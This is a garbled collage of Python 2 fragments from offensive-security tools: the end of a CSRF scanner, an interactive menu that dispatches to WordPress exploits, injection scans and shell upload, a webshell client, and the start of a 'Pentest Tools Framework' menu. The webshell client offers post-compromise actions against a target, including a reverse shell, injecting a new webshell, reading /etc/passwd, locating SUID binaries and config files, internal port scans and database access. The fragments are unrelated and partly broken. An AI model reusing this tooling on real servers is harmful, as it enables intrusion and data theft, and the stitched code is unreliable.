                                r2 = Post(url, action, result).text  # again make request with token values generated as user2
                                # Go for token based entropy checks...
                                try:
                                    if m['name']:
                                        query, token = Entropy(result, url, m['action'], m['name'])
                                except KeyError:
                                    query, token = Entropy(result, url, m['action'])
                                # Go for token parameter tamper checks.
                                if (query and token):
                                    Tamper(url, action, result, r2, query, token)
                                o2 = resp2.open(url).read()  # make request as user2
                                try:
                                    form2 = Debugger.getAllForms(BeautifulSoup(o2))[i]  # user2 gets his form
                                except IndexError:
                                    verbout(R, 'Form Error')
                                    continue  # making sure program won't end here (dirty fix :( )
                                verbout(GR, 'Preparing form inputs...')
                                contents2 = form.prepareFormInputs(form2)  # prepare for form 2 as user2
                                r3 = Post(url, action, contents2).text  # make request as user3 with user2's form
                                if POST_BASED:
                                    try:
                                        if m['name']:
                                            PostBased(url, r1, r2, r3, m['action'], result, m['name'])
                                    except KeyError:
                                        PostBased(url, r1, r2, r3, m['action'], result)
                            except HTTPError as msg:  # if runtime exception...
                                verbout(R, 'Exception : ' + msg.__str__())  # again exception :(
                    actionDone.append(action)  # add the stuff done
                    i += 1  # Increase user iteration
            except URLError:  # network-level failure for this page
                verbout(R, 'Exception at : ' + url)  # again exception -_-
                time.sleep(0.4)
                verbout(O, 'Moving on...')
                continue  # make sure it doesn't stop
        print('\n' + G + "Scan completed!" + '\n')
        Analysis()  # For Post Scan Analysis
    # This error usually happens when some sites are protected by some load balancer
    # example Cloudflare. These domains return a 403 forbidden response in various
    # contexts. For example when making reverse DNS queries.
    except HTTPError as e:
        # Only 403 is handled; any other HTTPError is swallowed here.
        if str(e.code) == '403':
            verbout(R, 'HTTP Authentication Error!')
            verbout(R, 'Error Code : ' + O + str(e.code))
            quit()
    except KeyboardInterrupt:  # user wants to exit (while crawling)
        verbout(R, 'User Interrupt!')
        time.sleep(1.5)
        Analysis()  # For Post scan Analysis
        print(R + 'Aborted!')  # say goodbye
        quit()
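def debby_anggraini():
    """Interactive ``Eazy_>`` prompt dispatching to the scanner/exploit modules.

    Each line is split on whitespace; ``toxic`` extracts the ``-u -t -s -n
    -f`` options into ``arg``.  The first word selects the module; ``-h`` /
    ``--help`` anywhere after it prints that module's help.  ``:! CMD`` runs
    CMD through ``os.system`` (only when a command is actually given —
    previously an empty shell was spawned as well), ``q``/``quit`` leaves.
    ``IndexError``/``KeyError`` from a module missing its arguments fall
    back to that module's usage text; network and other errors are printed
    and the loop continues.
    """
    banner()
    complete(array)
    while True:
        try:
            an = raw_input('Eazy_> ')
            wibu = an.split()
            arg = toxic(wibu, '-u,-t,-s,-n,-f')  # manual option parsing
            if not wibu:
                pass
            # help menu: -h/--help given after the module name
            elif wibu[0] != '-h' and '-h' in wibu or wibu[0] != '--help' and '--help' in wibu:
                help_menu(wibu[0])
            # advanced nmap commands
            elif wibu[0] == 'nmap':
                debby_lovlov(arg['-t'], arg['-u'])
            # webkit modules: key lookup replaces the original scan over all keys
            elif wibu[0] in webkit_dict:
                hackertarget(webkit_dict[wibu[0]], arg['-u'])
            elif wibu[0] == 'geoip':
                geoip(arg['-u'])
            elif wibu[0] == 'mxrecords':
                mx(arg['-u'])
            elif wibu[0] == 'domain_age':
                domage(arg['-u'])
            elif wibu[0] == 'whatcms':
                cms(arg['-u'])
            elif wibu[0] == 'subdomain':
                subdo(arg['-u'])
            elif wibu[0] == 'honeypot':
                honey(arg['-u'])
            elif wibu[0] == 'joom_sql_scan':
                j_sql(arg['-u'])
            elif wibu[0] == 'xss_scan':
                xss(arg['-u'])
            elif wibu[0] == 'rce_scan':
                rcevuln(arg['-u'])
            # exploit module
            elif wibu[0] == 'wpscan':
                wpscan(arg['-u'])
            elif wibu[0] == 'user_pro':
                check_vuln(arg['-u'])
            elif wibu[0] == 'wp_user':
                user_scan(arg['-u'], arg['-n'])
            elif wibu[0] == 'wp_sym_exp':
                exploit_wp(arg['-u'], arg['-f'])
            elif wibu[0] == 'simple_slide_show_exp':
                sss_ex(arg['-u'], arg['-f'])
            elif wibu[0] == 'product_page_advert_exp':
                ppa_ex(arg['-u'], arg['-f'])
            elif wibu[0] == 'home_page_advert_exp':
                hpa_ex(arg['-u'], arg['-f'])
            # scanner module
            elif wibu[0] == 'lfi_scan':
                lfiscan(arg['-u'])
            elif wibu[0] == 'hashbuster':
                hash_scan()
            elif wibu[0] == 'shell':
                shell(arg['-u'])
            elif wibu[0] == 'dirscan':
                dir(arg['-u'])
            # 'dork' with no query raises IndexError -> usage('dork') below
            elif wibu[0] == 'dork' and wibu[1] is not None:
                msg = an.replace(wibu[0] + ' ', '').replace('-s ', '').replace('-s', '')
                if not msg:
                    usage('dork')
                elif '-s' in an:
                    dorking(msg, 'scan')
                else:
                    dorking(msg, )
            # brute force module
            elif wibu[0] == 'adfin':
                adfin(arg['-u'])
            elif wibu[0] == 'upload':
                upload(arg['-u'])
            # encryption modules
            elif wibu[0] in encdec_array:
                if '--enc' in wibu or '-e' in wibu:
                    ende(wibu[0], 'enc')
                elif '--dec' in wibu or '-d' in wibu:
                    ende(wibu[0], 'dec')
                else:
                    usage(wibu[0])
            elif wibu[0] in hash_array:
                hash(wibu[0], arg['-s'])
            # others: shell escape
            elif wibu[0] == ':!':
                if len(wibu) == 1:
                    printf('sh: commands not found', 2)
                else:
                    # Runs the rest of the line verbatim in the local shell.
                    os.system(an[2:])
            elif wibu[0] in ['q', 'quit']:
                printf('[!] bye bye..')
                break
            elif an == 'show modules' or an == 'help':
                show_modules()
            elif an == 'show all modules' or an == 'help more':
                show_modules('wibu bau bawang')
            else:
                printf('%s: not found.' % wibu[0], 2)
        # usage
        except (IndexError, KeyError):
            usage(wibu[0])
        # user interrupt
        except KeyboardInterrupt:
            printf('\n\rError: Interrupt..')
        # handle error
        except (requests.exceptions.ConnectionError):
            printf('Connection Error..', 2)
        except Exception as e:
            printf('%s' % str(e), 2)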
def main():
    """Entry point of the interactive webshell client.

    Expects exactly three positional arguments (``url``, ``method``,
    ``password``), builds a ``WebShell`` from them and then runs a
    read-eval loop.  Each prompt line is lower-cased for keyword matching;
    a line that matches no keyword is executed as-is, either on the local
    host via ``os.system`` or on the remote side via
    ``webshell.auto_exec_print``, depending on ``LOCAL_COMMAND_FLAG``.

    Exit codes: 1 on a wrong argument count, 2 when ``webshell.working``
    is false.
    """
    banner()
    if len(sys.argv) != 4:
        show_help()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    # `password` is reassigned in the "aiw" and "db" branches below; the
    # WebShell instance keeps its own copy, so only readability suffers.
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    # True  -> unrecognised input runs on this machine through os.system
    # False -> unrecognised input is sent to the target ("setr" / "setl").
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)
    main_help()
    while True:
        Log.context("sniper")
        # An empty line defaults to the help command.
        context_fresh = raw_input("=>") or "h"
        # Python 2 only: string.lower() does not exist in Python 3.
        # Keywords are matched on the lower-cased copy; the raw text is
        # what the fall-through branch at the bottom executes.
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" % (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            webshell.get_php_version()
        elif context == "kv" or context == "kernel_version":
            webshell.get_kernel_version()
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        # Toggle where fall-through commands are executed.
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            # `args` is spliced verbatim into a `find` command line.
            args = raw_input("Please custom find args (%s) : " % (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!"
                          % (path))
                continue
            if webshell.is_directory(path):
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " % ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                # The remote path is reused unchanged as the local save path.
                Log.info(
                    "The target file is a single file, starting download...")
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            # Only the presence of '/' is validated, not the address or mask.
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # Python 2 only: string.letters was removed in Python 3.
            default = random_string(0x10, string.letters)
            filename = raw_input("Filename (.%s.php): " % (default)) or (".%s.php" % (default))
            password = raw_input("Password (%s): " % (default)) or ("%s" % (default))
            webshell.auto_inject_webshell(filename, password)
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            # raw_input echoes the password, and it is written to the log
            # in clear text on the next statement.
            password = raw_input("Password (root): ") or "root"
            Log.info("Creating connection by [%s:%s] to [%s]..."
                     % (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            # `function` was already checked for truthiness above, so the
            # else branch here is unreachable.
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            # Fall-through: input that matches no keyword is executed as-is.
            # With LOCAL_COMMAND_FLAG set (the default) a typo at the prompt
            # therefore runs through the local shell.
            # NOTE(review): the original indentation was lost; this block is
            # read as part of the else branch -- confirm.
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)
import os,time,sys
import core
from time import sleep
# Wildcard import: every public name of `ptf` lands in this namespace and
# may shadow, or be shadowed by, the names defined below.
from ptf import *
from core.exploit import clean
from core.banner import banner,ptf

# ANSI colour codes used for terminal output.
R = '\033[31m'  # Red
N = '\033[1;37m'  # White
G = '\033[32m'  # Green
O = '\033[0;33m'  # Orange
B = '\033[1;34m'  # Blue
E = '\033[0m'  # End

# Refuse to run unless the effective UID is 0; everything the framework
# does afterwards therefore runs with root privileges.
if not os.geteuid() == 0:
    sys.exit("""\033[1;91m\n[!] Pentest Tools Framework run as root!!. \n\033[1;m""")

# NOTE(review): when run as a script, `__name__ == "__main__"` is true and
# clean()/banner()/ptf() are short-circuited, so they never run; when
# imported they run as side effects instead.  main() is also called here
# before the `def main()` below has executed, which raises NameError unless
# `from ptf import *` already bound a `main` -- confirm.
if __name__ == "__main__" or clean() or banner() or ptf():
    main()


def main():
    """Top-level menu loop: read a command and enter the matching sub-menu.

    Each branch re-enters main() recursively rather than continuing the
    loop, so every menu switch adds a stack frame.
    """
    while True:
        try:
            PTF = raw_input("Pentest>> ")
            if PTF == 'use modules/exploits':
                core.menu.exploits()
                main()
            elif PTF == 'use modules/scanners':
                core.menu.scan()
                main()
            elif PTF =='use modules/password':
                core.menu.pas1()
                main()
            elif PTF == 'use modules/post':